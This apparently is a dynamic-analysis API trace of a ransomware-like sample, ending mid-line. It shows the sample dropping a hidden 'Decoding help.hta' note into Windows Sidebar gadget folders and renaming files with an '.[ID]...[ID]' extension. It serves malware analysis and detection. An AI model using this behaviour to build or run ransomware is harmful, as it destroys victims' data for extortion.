1 [0047.622] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.622] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.622] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86bc72d2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86bc72d2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3d3f607d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7575, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.122] lstrcpyW (in: lpString1=0x10e2ec98, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0049.122] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0049.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" [0049.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta")) returned 0xffffffff [0049.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5c0 [0050.381] WriteFile (in: hFile=0x5c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d99fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d99fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.533] CloseHandle (hObject=0x5c0) returned 1 [0053.665] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.608] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0057.608] lstrlenW (lpString="drag.png") returned 8 [0057.608] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.608] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" [0057.608] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" [0057.608] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0057.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.608] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x24022fc4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0057.608] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0057.608] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0057.608] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0057.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.609] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.609] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US" [0057.609] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0057.609] GlobalMemoryStatus (in: lpBuffer=0x1d99fd10 | out: lpBuffer=0x1d99fd10) [0057.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110cb940, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9b0 [0057.610] CloseHandle (hObject=0x9b0) returned 1 [0057.610] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d442339, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x3d442339, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x3d442339, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2732, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0057.610] lstrcpyW (in: lpString1=0x10e2ec98, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.610] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" [0057.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta")) returned 0x1 [0057.610] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0057.610] lstrlenW (lpString="icon.png") returned 8 [0057.610] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.610] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" [0057.610] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" [0057.610] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0057.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.610] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0057.610] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0057.610] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0057.610] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0057.611] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.611] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.611] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images" [0057.611] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0057.611] GlobalMemoryStatus (in: lpBuffer=0x1d99fd10 | out: lpBuffer=0x1d99fd10) [0057.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94906c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9b0 [0057.611] CloseHandle (hObject=0x9b0) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b7b018, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86b7b018, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3db4037b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0057.612] lstrcpyW (in: lpString1=0x10e2ec98, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.612] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" [0057.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta")) returned 0x1 [0057.612] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0057.612] lstrlenW (lpString="logo.png") returned 8 [0057.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0057.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 65 [0057.612] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" [0057.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" [0057.612] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0057.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.614] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b7b018, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86b7b018, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3db4037b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0057.614] FindClose (in: hFindFile=0x5e2870 | out: hFindFile=0x5e2870) returned 1 Thread: id = 451 os_tid = 0x8b0 [0044.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*", lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7f10 [0049.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.245] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.245] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.245] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876a3657, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x876a3657, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2a5f4919, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3260, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.617] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0049.617] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0049.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" [0049.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta")) returned 0xffffffff [0049.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x680 [0052.142] WriteFile (in: hFile=0x680, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1dadfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1dadfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.971] CloseHandle (hObject=0x680) returned 1 [0055.309] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.055] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0058.055] lstrlenW (lpString="drag.png") returned 8 [0058.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.055] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" [0058.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" [0058.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.055] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22c02035, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.055] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.055] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.055] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.055] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US" [0058.056] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.056] GlobalMemoryStatus (in: lpBuffer=0x1dadfd10 | out: lpBuffer=0x1dadfd10) [0058.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25348128, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0058.056] CloseHandle (hObject=0x2b4) returned 1 [0058.056] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a61aa77, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x2a61aa77, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x2a640bd5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x32a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0058.057] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program 